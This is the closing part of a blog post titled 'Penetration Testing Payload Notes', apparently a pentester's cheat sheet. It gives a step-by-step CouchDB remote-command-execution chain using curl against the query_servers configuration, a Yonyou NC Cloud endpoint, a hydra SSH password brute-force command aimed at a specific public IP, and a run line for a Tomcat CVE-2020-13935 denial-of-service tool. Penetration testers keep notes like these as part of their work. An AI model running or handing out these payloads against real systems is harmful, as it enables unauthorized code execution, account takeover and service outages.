# 1. Add a query_server entry; this one runs whoami and writes the result to /tmp/6666
curl -X PUT 'http://192.168.2.12:5984/_config/query_servers/cmd' -d '"whoami>/tmp/6666"'
# _config/query_servers/ is fixed
# the query-server name can be changed
# 2. Create a temporary database and insert one record
curl -X PUT 'http://192.168.2.12:5984/vultest'
curl -X PUT 'http://192.168.2.12:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
# vultest and vul can be changed
# 3. Invoke the query_server to process the data
curl -X POST 'http://192.168.2.12:5984/vultest/_temp_view?limit=11' -d '{"language":"cmd","map":""}' -H 'Content-Type: application/json'
```

Yonyou NC Cloud (NC <= 6.5, dork: Yonyou NC httpd)

```
/ServiceDispatcherServlet/default   exists
```

Notepad++ de-duplication regex:

```
^(.*?)$\s+?^(?=.*^\1$)
```

hydra

```shell
hydra -l root -P ssh_password.txt -t 11 ssh://119.23.31.7
```

CVE-2020-13935

```shell
# https://github.com/RedTeamPentesting/CVE-2020-13935

tcdos.exe ws://127.0.0.1:8080/examples/websocket/echoProgrammatic
```

Title: 【Pinned】Penetration Testing Payload Notes

Author:

Published: 2022-08-19 19:37:52

Last updated: 2021-01-29 13:47:52

Original link: http://laker.xyz/2022/08/19/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95Payload%E8%AE%B0%E5%BD%95/

License: CC BY-NC-ND 4.0 International (Attribution-NonCommercial-NoDerivatives). Please keep the original link and author attribution when reposting.